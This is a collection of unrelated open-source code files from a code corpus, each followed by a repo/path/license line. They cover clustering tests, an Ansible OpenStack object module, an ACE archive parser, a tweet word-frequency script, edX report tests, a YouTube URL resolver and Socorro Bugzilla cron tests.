assert_raises(ValueError, affinity_propagation, S, damping=0)
af = AffinityPropagation(affinity="unknown")
assert_raises(ValueError, af.fit, X)
def test_affinity_propagation_predict():
# Test AffinityPropagation.predict
af = AffinityPropagation(affinity="euclidean")
labels = af.fit_predict(X)
labels2 = af.predict(X)
assert_array_equal(labels, labels2)
def test_affinity_propagation_predict_error():
# Test exception in AffinityPropagation.predict
# Not fitted.
af = AffinityPropagation(affinity="euclidean")
assert_raises(ValueError, af.predict, X)
# Predict not supported when affinity="precomputed".
S = np.dot(X, X.T)
af = AffinityPropagation(affinity="precomputed")
af.fit(S)
assert_raises(ValueError, af.predict, X)
| bsd-3-clause |
gaddman/ansible | lib/ansible/modules/cloud/openstack/os_object.py | 87 | 3841 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2013, Benno Joy <benno@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: os_object
short_description: Create or Delete objects and containers from OpenStack
version_added: "2.0"
author: "Monty Taylor (@emonty)"
extends_documentation_fragment: openstack
description:
- Create or Delete objects and containers from OpenStack
options:
container:
description:
- The name of the container in which to create the object
required: true
name:
description:
- Name to be give to the object. If omitted, operations will be on
the entire container
required: false
filename:
description:
- Path to local file to be uploaded.
required: false
container_access:
description:
- desired container access level.
required: false
choices: ['private', 'public']
default: private
state:
description:
- Should the resource be present or absent.
choices: [present, absent]
default: present
availability_zone:
description:
- Ignored. Present for backwards compatibility
required: false
'''
EXAMPLES = '''
- name: "Create a object named 'fstab' in the 'config' container"
os_object:
cloud: mordred
state: present
name: fstab
container: config
filename: /etc/fstab
- name: Delete a container called config and all of its contents
os_object:
cloud: rax-iad
state: absent
container: config
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.openstack import openstack_full_argument_spec, openstack_module_kwargs, openstack_cloud_from_module
def process_object(
cloud_obj, container, name, filename, container_access, **kwargs):
changed = False
container_obj = cloud_obj.get_container(container)
if kwargs['state'] == 'present':
if not container_obj:
container_obj = cloud_obj.create_container(container)
changed = True
if cloud_obj.get_container_access(container) != container_access:
cloud_obj.set_container_access(container, container_access)
changed = True
if name:
if cloud_obj.is_object_stale(container, name, filename):
cloud_obj.create_object(container, name, filename)
changed = True
else:
if container_obj:
if name:
if cloud_obj.get_object_metadata(container, name):
cloud_obj.delete_object(container, name)
changed = True
else:
cloud_obj.delete_container(container)
changed = True
return changed
def main():
argument_spec = openstack_full_argument_spec(
name=dict(required=False, default=None),
container=dict(required=True),
filename=dict(required=False, default=None),
container_access=dict(default='private', choices=['private', 'public']),
state=dict(default='present', choices=['absent', 'present']),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec, **module_kwargs)
sdk, cloud = openstack_cloud_from_module(module)
try:
changed = process_object(cloud, **module.params)
module.exit_json(changed=changed)
except sdk.exceptions.OpenStackCloudException as e:
module.fail_json(msg=str(e))
if __name__ == "__main__":
main()
| gpl-3.0 |
elit3ge/SickRage | lib/hachoir_parser/archive/ace.py | 95 | 9944 | """
ACE parser
From wotsit.org and the SDK header (bitflags)
Partial study of a new block type (5) I've called "new_recovery", as its
syntax is very close to the former one (of type 2).
Status: can only read totally file and header blocks.
Author: Christophe Gisquet <christophe.gisquet@free.fr>
Creation date: 19 january 2006
"""
from hachoir_parser import Parser
from hachoir_core.field import (StaticFieldSet, FieldSet,
Bit, Bits, NullBits, RawBytes, Enum,
UInt8, UInt16, UInt32,
PascalString8, PascalString16, String,
TimeDateMSDOS32)
from hachoir_core.text_handler import textHandler, filesizeHandler, hexadecimal
from hachoir_core.endian import LITTLE_ENDIAN
from hachoir_parser.common.msdos import MSDOSFileAttr32
MAGIC = "**ACE**"
OS_MSDOS = 0
OS_WIN32 = 2
HOST_OS = {
0: "MS-DOS",
1: "OS/2",
2: "Win32",
3: "Unix",
4: "MAC-OS",
5: "Win NT",
6: "Primos",
7: "APPLE GS",
8: "ATARI",
9: "VAX VMS",
10: "AMIGA",
11: "NEXT",
}
COMPRESSION_TYPE = {
0: "Store",
1: "Lempel-Ziv 77",
2: "ACE v2.0",
}
COMPRESSION_MODE = {
0: "fastest",
1: "fast",
2: "normal",
3: "good",
4: "best",
}
# TODO: Computing the CRC16 would also prove useful
#def markerValidate(self):
# return not self["extend"].value and self["signature"].value == MAGIC and \
# self["host_os"].value<12
class MarkerFlags(StaticFieldSet):
format = (
(Bit, "extend", "Whether the header is extended"),
(Bit, "has_comment", "Whether the archive has a comment"),
(NullBits, "unused", 7, "Reserved bits"),
(Bit, "sfx", "SFX"),
(Bit, "limited_dict", "Junior SFX with 256K dictionary"),
(Bit, "multi_volume", "Part of a set of ACE archives"),
(Bit, "has_av_string", "This header holds an AV-string"),
(Bit, "recovery_record", "Recovery record preset"),
(Bit, "locked", "Archive is locked"),
(Bit, "solid", "Archive uses solid compression")
)
def markerFlags(self):
yield MarkerFlags(self, "flags", "Marker flags")
def markerHeader(self):
yield String(self, "signature", 7, "Signature")
yield UInt8(self, "ver_extract", "Version needed to extract archive")
yield UInt8(self, "ver_created", "Version used to create archive")
yield Enum(UInt8(self, "host_os", "OS where the files were compressed"), HOST_OS)
yield UInt8(self, "vol_num", "Volume number")
yield TimeDateMSDOS32(self, "time", "Date and time (MS DOS format)")
yield Bits(self, "reserved", 64, "Reserved size for future extensions")
flags = self["flags"]
if flags["has_av_string"].value:
yield PascalString8(self, "av_string", "AV String")
if flags["has_comment"].value:
size = filesizeHandler(UInt16(self, "comment_size", "Comment size"))
yield size
if size.value > 0:
yield RawBytes(self, "compressed_comment", size.value, \
"Compressed comment")
class FileFlags(StaticFieldSet):
format = (
(Bit, "extend", "Whether the header is extended"),
(Bit, "has_comment", "Presence of file comment"),
(Bits, "unused", 10, "Unused bit flags"),
(Bit, "encrypted", "File encrypted with password"),
(Bit, "previous", "File continued from previous volume"),
(Bit, "next", "File continues on the next volume"),
(Bit, "solid", "File compressed using previously archived files")
)
def fileFlags(self):
yield FileFlags(self, "flags", "File flags")
def fileHeader(self):
yield filesizeHandler(UInt32(self, "compressed_size", "Size of the compressed file"))
yield filesizeHandler(UInt32(self, "uncompressed_size", "Uncompressed file size"))
yield TimeDateMSDOS32(self, "ftime", "Date and time (MS DOS format)")
if self["/header/host_os"].value in (OS_MSDOS, OS_WIN32):
yield MSDOSFileAttr32(self, "file_attr", "File attributes")
else:
yield textHandler(UInt32(self, "file_attr", "File attributes"), hexadecimal)
yield textHandler(UInt32(self, "file_crc32", "CRC32 checksum over the compressed file)"), hexadecimal)
yield Enum(UInt8(self, "compression_type", "Type of compression"), COMPRESSION_TYPE)
yield Enum(UInt8(self, "compression_mode", "Quality of compression"), COMPRESSION_MODE)
yield textHandler(UInt16(self, "parameters", "Compression parameters"), hexadecimal)
yield textHandler(UInt16(self, "reserved", "Reserved data"), hexadecimal)
# Filename
yield PascalString16(self, "filename", "Filename")
# Comment
if self["flags/has_comment"].value:
yield filesizeHandler(UInt16(self, "comment_size", "Size of the compressed comment"))
if self["comment_size"].value > 0:
yield RawBytes(self, "comment_data", self["comment_size"].value, "Comment data")
def fileBody(self):
size = self["compressed_size"].value
if size > 0:
yield RawBytes(self, "compressed_data", size, "Compressed data")
def fileDesc(self):
return "File entry: %s (%s)" % (self["filename"].value, self["compressed_size"].display)
def recoveryHeader(self):
yield filesizeHandler(UInt32(self, "rec_blk_size", "Size of recovery data"))
self.body_size = self["rec_blk_size"].size
yield String(self, "signature", 7, "Signature, normally '**ACE**'")
yield textHandler(UInt32(self, "relative_start",
"Relative start (to this block) of the data this block is mode of"),
hexadecimal)
yield UInt32(self, "num_blocks", "Number of blocks the data is split into")
yield UInt32(self, "size_blocks", "Size of these blocks")
yield UInt16(self, "crc16_blocks", "CRC16 over recovery data")
    # num_blocks blocks of size size_blocks follow
# The ultimate data is the xor data of all those blocks
size = self["size_blocks"].value
for index in xrange(self["num_blocks"].value):
yield RawBytes(self, "data[]", size, "Recovery block %i" % index)
yield RawBytes(self, "xor_data", size, "The XOR value of the above data blocks")
def recoveryDesc(self):
return "Recovery block, size=%u" % self["body_size"].display
def newRecoveryHeader(self):
"""
This header is described nowhere
"""
if self["flags/extend"].value:
yield filesizeHandler(UInt32(self, "body_size", "Size of the unknown body following"))
self.body_size = self["body_size"].value
yield textHandler(UInt32(self, "unknown[]", "Unknown field, probably 0"),
hexadecimal)
yield String(self, "signature", 7, "Signature, normally '**ACE**'")
yield textHandler(UInt32(self, "relative_start",
"Offset (=crc16's) of this block in the file"), hexadecimal)
yield textHandler(UInt32(self, "unknown[]",
"Unknown field, probably 0"), hexadecimal)
class BaseFlags(StaticFieldSet):
format = (
(Bit, "extend", "Whether the header is extended"),
(NullBits, "unused", 15, "Unused bit flags")
)
def parseFlags(self):
yield BaseFlags(self, "flags", "Unknown flags")
def parseHeader(self):
if self["flags/extend"].value:
yield filesizeHandler(UInt32(self, "body_size", "Size of the unknown body following"))
self.body_size = self["body_size"].value
def parseBody(self):
if self.body_size > 0:
yield RawBytes(self, "body_data", self.body_size, "Body data, unhandled")
class Block(FieldSet):
TAG_INFO = {
0: ("header", "Archiver header", markerFlags, markerHeader, None),
1: ("file[]", fileDesc, fileFlags, fileHeader, fileBody),
2: ("recovery[]", recoveryDesc, recoveryHeader, None, None),
5: ("new_recovery[]", None, None, newRecoveryHeader, None)
}
def __init__(self, parent, name, description=None):
FieldSet.__init__(self, parent, name, description)
self.body_size = 0
self.desc_func = None
type = self["block_type"].value
if type in self.TAG_INFO:
self._name, desc, self.parseFlags, self.parseHeader, self.parseBody = self.TAG_INFO[type]
if desc:
if isinstance(desc, str):
self._description = desc
else:
self.desc_func = desc
else:
self.warning("Processing as unknown block block of type %u" % type)
if not self.parseFlags:
self.parseFlags = parseFlags
if not self.parseHeader:
self.parseHeader = parseHeader
if not self.parseBody:
self.parseBody = parseBody
def createFields(self):
yield textHandler(UInt16(self, "crc16", "Archive CRC16 (from byte 4 on)"), hexadecimal)
yield filesizeHandler(UInt16(self, "head_size", "Block size (from byte 4 on)"))
yield UInt8(self, "block_type", "Block type")
# Flags
for flag in self.parseFlags(self):
yield flag
# Rest of the header
for field in self.parseHeader(self):
yield field
size = self["head_size"].value - (self.current_size//8) + (2+2)
if size > 0:
yield RawBytes(self, "extra_data", size, "Extra header data, unhandled")
# Body in itself
for field in self.parseBody(self):
yield field
def createDescription(self):
if self.desc_func:
return self.desc_func(self)
else:
return "Block: %s" % self["type"].display
class AceFile(Parser):
endian = LITTLE_ENDIAN
PARSER_TAGS = {
"id": "ace",
"category": "archive",
"file_ext": ("ace",),
"mime": (u"application/x-ace-compressed",),
"min_size": 50*8,
"description": "ACE archive"
}
def validate(self):
if self.stream.readBytes(7*8, len(MAGIC)) != MAGIC:
return "Invalid magic"
return True
def createFields(self):
while not self.eof:
yield Block(self, "block[]")
| gpl-3.0 |
eriksonJAguiar/TCC-UENP-Codigos | My_codes/tools-sentiment/word_freq.py | 1 | 4759 | import nltk
import pandas as pd
import re
from googletrans import Translator
from unicodedata import normalize
def read_csv(file):
df1 = pd.DataFrame.from_csv('files_extern/%s.csv'%(file),sep=';',index_col=0,encoding ='ISO-8859-1')
df1 = df1.reset_index()
return df1
def write_csv(data,file):
df = pd.DataFrame(data)
df.to_csv('files_extern/'+file+'.csv', mode='w', sep=';',index=False, header=False,encoding='utf8')
def clear(dataframe):
new_df_tweet = []
new_df_sent = []
zipped = zip(dataframe['tweet'],dataframe['opiniao'])
for (df,opiniao) in zipped:
expr = re.sub(r"http\S+", "", df)
#expr = re.sub(r"[@#]\S+","",expr)
expr = normalize('NFKD',expr).encode('ASCII','ignore').decode('ASCII')
filtrado = [w for w in nltk.regexp_tokenize(expr.lower(),"[^0-9\W_]+") if not w in nltk.corpus.stopwords.words('portuguese')]
for f in filtrado:
if len(f) >= 2:
#print(f)
#print(opiniao)
new_df_tweet.append(f)
new_df_sent.append(opiniao)
new_df = pd.DataFrame()
new_df['tokens'] = new_df_tweet
new_df['sentimento'] = new_df_sent
return new_df
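# Illustrative note (not from the original file): clear() lowercases the
# tweets, strips URLs, accents and Portuguese stopwords, and emits one row
# per surviving token, e.g. "Adorei o filme!" labelled 1 becomes the token
# rows ('adorei', 1) and ('filme', 1).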
def convert_df(df):
new_df = []
for d in df:
if d == 'Positivo':
new_df.append(1)
elif d == 'Neutro':
new_df.append(0)
elif d == 'Negativo':
new_df.append(-1)
return new_df
def exlusivos(vet_neg,vet_neu,vet_pos):
ex_pos = []
ex_neg = []
ex_neu = []
tupla = zip(vet_neg,vet_neu,vet_pos)
for (neg,neu,pos) in tupla:
if not (neg in vet_pos or neg in vet_neu):
ex_neg.append(neg)
if not (neu in vet_neg or neu in vet_pos):
ex_neu.append(neu)
if not (pos in vet_neg or pos in vet_neu):
ex_pos.append(pos)
print(ex_neg)
print(ex_neu)
print(ex_pos)
return ex_neg, ex_neu, ex_pos
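# Note (descriptive, added): exlusivos() keeps only the words that appear in
# exactly one sentiment list. Because it iterates zip(vet_neg, vet_neu,
# vet_pos), it inspects no more words than the shortest list holds.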
def bigram(frases, vet_neg, vet_neu, vet_pos):
    # The original body ended mid-statement ("if f.find()"); the completion
    # below is an assumption: keep the phrases containing a word from each
    # sentiment list.
    bi_neg = [f for f in frases if any(w in f for w in vet_neg)]
    bi_neu = [f for f in frases if any(w in f for w in vet_neu)]
    bi_pos = [f for f in frases if any(w in f for w in vet_pos)]
    return bi_neg, bi_neu, bi_pos
if __name__ == '__main__':
df_tweets = read_csv('dataset-portuguese')
df_tweets['opiniao'] = convert_df(df_tweets['opiniao'])
df_words = clear(df_tweets)
neg = df_words.loc[df_words['sentimento'] == -1]
neu = df_words.loc[df_words['sentimento'] == 0]
pos = df_words.loc[df_words['sentimento'] == 1]
neg_freq = nltk.FreqDist(neg['tokens'])
neu_freq = nltk.FreqDist(neu['tokens'])
pos_freq = nltk.FreqDist(pos['tokens'])
vet_neg = []
vet_neu = []
vet_pos = []
#neg_freq.plot(50, cumulative=False)
#neu_freq.plot(50, cumulative=False)
#pos_freq.plot(50, cumulative=False)
#print(neg_freq.most_common(30))
#print('------------------------')
#print(neu_freq.most_common(30))
#print('------------------------')
#print(pos_freq.most_common(30))
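# zip() stops at the shortest of the three frequency lists, so the classes are walked in parallel only up to that length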
tupla = zip(neg_freq.most_common(len(neg)),neu_freq.most_common(len(neu)),pos_freq.most_common(len(pos)))
df_neg = pd.DataFrame()
df_neu = pd.DataFrame()
df_pos = pd.DataFrame()
words_neg = dict()
words_neu = dict()
words_pos = dict()
words_neg['pt'] = []
words_neg['en'] = []
words_neg['es'] = []
words_neu['pt'] = []
words_neu['en'] = []
words_neu['es'] = []
words_pos['pt'] = []
words_pos['en'] = []
words_pos['es'] = []
#neg_freq.plot(30, cumulative=False)
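# round-trip each exclusive token through googletrans: Portuguese -> English, then English -> Spanish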
translator = Translator(service_urls=['translate.google.com','translate.google.com.br'])
for (ng,nu,ps) in tupla:
vet_neg.append(ng[0])
vet_neu.append(nu[0])
vet_pos.append(ps[0])
vet_neg, vet_neu,vet_pos = exlusivos(vet_neg,vet_neu,vet_pos)
tupla = zip(vet_neg[:50],vet_neu[:50],vet_pos[:50])
for (ng,nu,ps) in tupla:
words_neg['pt'].append(ng)
en=translator.translate(ng, dest='en').text
words_neg['en'].append(en)
words_neg['es'].append(translator.translate(en, dest='es').text)
words_neu['pt'].append(nu)
en=translator.translate(nu, dest='en').text
words_neu['en'].append(en)
words_neu['es'].append(translator.translate(en, dest='es').text)
words_pos['pt'].append(ps)
en=translator.translate(ps, dest='en').text
words_pos['en'].append(en)
words_pos['es'].append(translator.translate(en, dest='es').text)
df_neg['pt'] = words_neg['pt']
df_neg['en'] = words_neg['en']
df_neg['es'] = words_neg['es']
df_neu['pt'] = words_neu['pt']
df_neu['en'] = words_neu['en']
df_neu['es'] = words_neu['es']
df_pos['pt'] = words_pos['pt']
df_pos['en'] = words_pos['en']
df_pos['es'] = words_pos['es']
write_csv(df_neg,'bigram_neg')
write_csv(df_neu,'bigram_neu')
write_csv(df_pos,'bigram_pos')
| gpl-3.0 |
andyzsf/edx | lms/djangoapps/instructor_task/tests/test_tasks_helper.py | 9 | 4496 | """
Unit tests for LMS instructor-initiated background tasks helper functions.
Tests that CSV grade report generation works with unicode emails.
"""
import ddt
from mock import Mock, patch
from django.test.testcases import TestCase
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from student.tests.factories import CourseEnrollmentFactory, UserFactory
from instructor_task.models import ReportStore
from instructor_task.tasks_helper import upload_grades_csv, upload_students_csv
from instructor_task.tests.test_base import InstructorTaskCourseTestCase, TestReportMixin
@ddt.ddt
class TestInstructorGradeReport(TestReportMixin, InstructorTaskCourseTestCase):
"""
Tests that CSV grade report generation works.
"""
def setUp(self):
self.course = CourseFactory.create()
@ddt.data([u'student@example.com', u'ni\xf1o@example.com'])
def test_unicode_emails(self, emails):
"""
Test that students with unicode characters in their emails are handled.
"""
for i, email in enumerate(emails):
self.create_student('student{0}'.format(i), email)
self.current_task = Mock()
self.current_task.update_state = Mock()
with patch('instructor_task.tasks_helper._get_current_task') as mock_current_task:
mock_current_task.return_value = self.current_task
result = upload_grades_csv(None, None, self.course.id, None, 'graded')
num_students = len(emails)
self.assertDictContainsSubset({'attempted': num_students, 'succeeded': num_students, 'failed': 0}, result)
@patch('instructor_task.tasks_helper._get_current_task')
@patch('instructor_task.tasks_helper.iterate_grades_for')
def test_grading_failure(self, mock_iterate_grades_for, _mock_current_task):
"""
Test that any grading errors are properly reported in the
progress dict and uploaded to the report store.
"""
# mock an error response from `iterate_grades_for`
mock_iterate_grades_for.return_value = [
(self.create_student('username', 'student@example.com'), {}, 'Cannot grade student')
]
result = upload_grades_csv(None, None, self.course.id, None, 'graded')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 0, 'failed': 1}, result)
report_store = ReportStore.from_config()
self.assertTrue(any('grade_report_err' in item[0] for item in report_store.links_for(self.course.id)))
@ddt.ddt
class TestStudentReport(TestReportMixin, InstructorTaskCourseTestCase):
"""
Tests that CSV student profile report generation works.
"""
def setUp(self):
self.course = CourseFactory.create()
def test_success(self):
self.create_student('student', 'student@example.com')
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_students_csv(None, None, self.course.id, task_input, 'calculated')
report_store = ReportStore.from_config()
links = report_store.links_for(self.course.id)
self.assertEquals(len(links), 1)
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
@ddt.data([u'student', u'student\xec'])
def test_unicode_usernames(self, students):
"""
Test that students with unicode characters in their usernames
are handled.
"""
for i, student in enumerate(students):
self.create_student(username=student, email='student{0}@example.com'.format(i))
self.current_task = Mock()
self.current_task.update_state = Mock()
task_input = {
'features': [
'id', 'username', 'name', 'email', 'language', 'location',
'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
'goals'
]
}
with patch('instructor_task.tasks_helper._get_current_task') as mock_current_task:
mock_current_task.return_value = self.current_task
result = upload_students_csv(None, None, self.course.id, task_input, 'calculated')
#This assertion simply confirms that the generation completed with no errors
num_students = len(students)
self.assertDictContainsSubset({'attempted': num_students, 'succeeded': num_students, 'failed': 0}, result)
| agpl-3.0 |
joolswills/plugin.video.youtube | resources/lib/youtube/helper/url_resolver.py | 24 | 6617 | import re
__author__ = 'bromix'
import urlparse
from resources.lib.kodion.utils import FunctionCache
import resources.lib.kodion.simple_requests as requests
class AbstractResolver(object):
def __init__(self):
pass
def supports_url(self, url, url_components):
raise NotImplementedError()
def resolve(self, url, url_components):
raise NotImplementedError()
pass
class YouTubeResolver(AbstractResolver):
RE_USER_NAME = re.compile(r'http(s)?://(www.)?youtube.com/(?P<user_name>[a-zA-Z0-9]+)$')
def __init__(self):
AbstractResolver.__init__(self)
pass
def supports_url(self, url, url_components):
if url_components.hostname == 'www.youtube.com' or url_components.hostname == 'youtube.com':
if url_components.path.lower() in ['/redirect', '/user']:
return True
if url_components.path.lower().startswith('/user'):
return True
re_match = self.RE_USER_NAME.match(url)
if re_match:
return True
pass
return False
def resolve(self, url, url_components):
def _load_page(_url):
# we try to extract the channel id from the html content. With the channel id we can construct a url we
# already work with.
# https://www.youtube.com/channel/<CHANNEL_ID>
try:
headers = {'Cache-Control': 'max-age=0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36',
'DNT': '1',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.8,de;q=0.6'}
response = requests.get(_url, headers=headers)
if response.status_code == 200:
re_match = re.search(r'<meta itemprop="channelId" content="(?P<channel_id>.+)">', response.text)
if re_match:
channel_id = re_match.group('channel_id')
return 'https://www.youtube.com/channel/%s' % channel_id
pass
except:
# do nothing
pass
return _url
if url_components.path.lower() == '/redirect':
params = dict(urlparse.parse_qsl(url_components.query))
return params['q']
if url_components.path.lower().startswith('/user'):
return _load_page(url)
re_match = self.RE_USER_NAME.match(url)
if re_match:
return _load_page(url)
return url
pass
class CommonResolver(AbstractResolver, list):
def __init__(self):
AbstractResolver.__init__(self)
pass
def supports_url(self, url, url_components):
return True
def resolve(self, url, url_components):
def _loop(_url, tries=5):
if tries == 0:
return _url
try:
headers = {'Cache-Control': 'max-age=0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36',
'DNT': '1',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.8,de;q=0.6'}
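# follow redirects manually (allow_redirects=False), one hop per recursion, so the depth is capped by the tries counter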
response = requests.head(_url, headers=headers, allow_redirects=False)
if response.status_code == 304:
return url
if response.status_code in [301, 302, 303]:
headers = response.headers
location = headers.get('location', '')
# validate the location - some servers return garbage
_url_components = urlparse.urlparse(location)
if not _url_components.scheme and not _url_components.hostname:
return url
# some servers return 301 for HEAD requests
# we just compare the new location - if it's equal we can return the url
if location == _url or location + '/' == _url or location == _url + '/':
return _url
if location:
return _loop(location, tries=tries - 1)
# just to be sure ;)
location = headers.get('Location', '')
if location:
return _loop(location, tries=tries - 1)
pass
except:
# do nothing
pass
return _url
resolved_url = _loop(url)
return resolved_url
pass
class UrlResolver(object):
def __init__(self, context):
self._context = context
self._cache = {}
self._youtube_resolver = YouTubeResolver()
self._resolver = [
self._youtube_resolver,
CommonResolver()
]
pass
def clear(self):
self._context.get_function_cache().clear()
pass
def _resolve(self, url):
# try one of the resolver
url_components = urlparse.urlparse(url)
for resolver in self._resolver:
if resolver.supports_url(url, url_components):
resolved_url = resolver.resolve(url, url_components)
self._cache[url] = resolved_url
# one last check...sometimes the resolved url is YouTube-specific and can be resolved again or
# simplified.
url_components = urlparse.urlparse(resolved_url)
if resolver is not self._youtube_resolver and self._youtube_resolver.supports_url(resolved_url,
url_components):
return self._youtube_resolver.resolve(resolved_url, url_components)
return resolved_url
pass
pass
def resolve(self, url):
function_cache = self._context.get_function_cache()
resolved_url = function_cache.get(FunctionCache.ONE_DAY, self._resolve, url)
if not resolved_url or resolved_url == '/':
return url
return resolved_url
pass
| gpl-2.0 |
adngdb/socorro | socorro/unittest/cron/jobs/test_bugzilla.py | 3 | 8870 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import pytest
import requests_mock
from crontabber.app import CronTabber
from socorro.cron.jobs.bugzilla import find_signatures
from socorro.cron.jobs.bugzilla import BUGZILLA_BASE_URL
from socorro.unittest.cron.setup_configman import (
get_config_manager_for_crontabber,
)
from socorro.unittest.cron.jobs.base import IntegrationTestBase
SAMPLE_BUGZILLA_RESULTS = {
'bugs': [
{
'id': '1',
'cf_crash_signature': 'This sig, while bogus, has a ] bracket',
},
{
'id': '2',
'cf_crash_signature': 'single [@ BogusClass::bogus_sig (const char**) ] signature',
},
{
'id': '3',
'cf_crash_signature': '[@ js3250.dll@0x6cb96] [@ valid.sig@0x333333]',
},
{
'id': '4',
'cf_crash_signature': '[@ layers::Push@0x123456] [@ layers::Push@0x123456]',
},
{
'id': '5',
'cf_crash_signature': (
'[@ MWSBAR.DLL@0x2589f] and a broken one [@ sadTrombone.DLL@0xb4s455'
),
},
{
'id': '6',
'cf_crash_signature': '',
},
{
'id': '7',
'cf_crash_signature': '[@gfx::font(nsTArray<nsRefPtr<FontEntry> > const&)]',
},
{
'id': '8',
'cf_crash_signature': '[@ legitimate(sig)] \n junk \n [@ another::legitimate(sig) ]',
},
{
'id': '42',
},
]
}
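# used as a class decorator, requests_mock passes a mocker instance into every test method below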
@requests_mock.Mocker()
class IntegrationTestBugzilla(IntegrationTestBase):
def tearDown(self):
self.conn.cursor().execute("TRUNCATE bug_associations CASCADE")
self.conn.commit()
super(IntegrationTestBugzilla, self).tearDown()
def _setup_config_manager(self, days_into_past):
return get_config_manager_for_crontabber(
jobs='socorro.cron.jobs.bugzilla.BugzillaCronApp|1d',
overrides={
'crontabber.class-BugzillaCronApp.days_into_past': days_into_past,
}
)
def test_basic_run_job(self, requests_mocker):
requests_mocker.get(BUGZILLA_BASE_URL, json=SAMPLE_BUGZILLA_RESULTS)
config_manager = self._setup_config_manager(3)
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
assert information['bugzilla-associations']
assert not information['bugzilla-associations']['last_error']
assert information['bugzilla-associations']['last_success']
cursor = self.conn.cursor()
cursor.execute('select bug_id from bug_associations order by bug_id')
associations = cursor.fetchall()
# Verify we have the expected number of associations.
assert len(associations) == 8
bug_ids = [x[0] for x in associations]
# Verify bugs with no crash signatures are missing.
assert 6 not in bug_ids
cursor.execute(
'select signature from bug_associations where bug_id = 8'
)
associations = cursor.fetchall()
# New signatures have correctly been inserted.
assert len(associations) == 2
assert ('another::legitimate(sig)',) in associations
assert ('legitimate(sig)',) in associations
def test_run_job_with_reports_with_existing_bugs_different(self, requests_mocker):
"""Verify that an association to a signature that no longer is part
of the crash signatures list gets removed.
"""
requests_mocker.get(BUGZILLA_BASE_URL, json=SAMPLE_BUGZILLA_RESULTS)
config_manager = self._setup_config_manager(3)
cursor = self.conn.cursor()
cursor.execute("""
insert into bug_associations (bug_id, signature)
values (8, '@different');
""")
self.conn.commit()
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
assert information['bugzilla-associations']
assert not information['bugzilla-associations']['last_error']
assert information['bugzilla-associations']['last_success']
cursor.execute(
'select signature from bug_associations where bug_id = 8'
)
associations = cursor.fetchall()
# The previous association, to signature '@different' that is not in
# crash signatures, is now missing.
assert ('@different',) not in associations
def test_run_job_with_reports_with_existing_bugs_same(self, requests_mocker):
requests_mocker.get(BUGZILLA_BASE_URL, json=SAMPLE_BUGZILLA_RESULTS)
config_manager = self._setup_config_manager(3)
cursor = self.conn.cursor()
cursor.execute("""
insert into bug_associations (bug_id, signature)
values (8, 'legitimate(sig)');
""")
self.conn.commit()
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
assert information['bugzilla-associations']
assert not information['bugzilla-associations']['last_error']
assert information['bugzilla-associations']['last_success']
cursor.execute(
'select signature from bug_associations where bug_id = 8'
)
associations = cursor.fetchall()
# New signatures have correctly been inserted.
assert len(associations) == 2
assert ('another::legitimate(sig)',) in associations
assert ('legitimate(sig)',) in associations
def test_run_job_based_on_last_success(self, requests_mocker):
"""specifically setting 0 days back and no prior run
will pick it up from now's date"""
requests_mocker.get(BUGZILLA_BASE_URL, json=SAMPLE_BUGZILLA_RESULTS)
config_manager = self._setup_config_manager(0)
cursor = self.conn.cursor()
# these match the SAMPLE_BUGZILLA_RESULTS above
cursor.execute("""insert into bug_associations
(bug_id,signature)
values
(8, 'legitimate(sig)');
""")
self.conn.commit()
# second time
config_manager = self._setup_config_manager(0)
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
state = tab.job_state_database.copy()
self._wind_clock(state, days=1)
tab.job_state_database.update(state)
# Create a CSV file for one day back.
# This'll make sure there's a .csv file whose day
# is that of the last run.
self._setup_config_manager(1)
config_manager = self._setup_config_manager(0)
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
assert information['bugzilla-associations']
assert not information['bugzilla-associations']['last_error']
assert information['bugzilla-associations']['last_success']
def test_with_bugzilla_failure(self, requests_mocker):
requests_mocker.get(
BUGZILLA_BASE_URL,
text='error loading content',
status_code=500
)
config_manager = self._setup_config_manager(3)
with config_manager.context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
assert information['bugzilla-associations']
# There has been an error.
last_error = information['bugzilla-associations']['last_error']
assert last_error
assert 'HTTPError' in last_error['type']
assert not information['bugzilla-associations']['last_success']
@pytest.mark.parametrize('content, expected', [
# Simple signature
('[@ moz::signature]', set(['moz::signature'])),
# Using unicode.
(u'[@ moz::signature]', set(['moz::signature'])),
# 2 signatures and some junk
(
'@@3*&^!~[@ moz::signature][@ ns::old ]',
set(['moz::signature', 'ns::old'])
),
# A signature containing square brackets.
(
'[@ moz::signature] [@ sig_with[brackets]]',
set(['moz::signature', 'sig_with[brackets]'])
),
# A malformed signature.
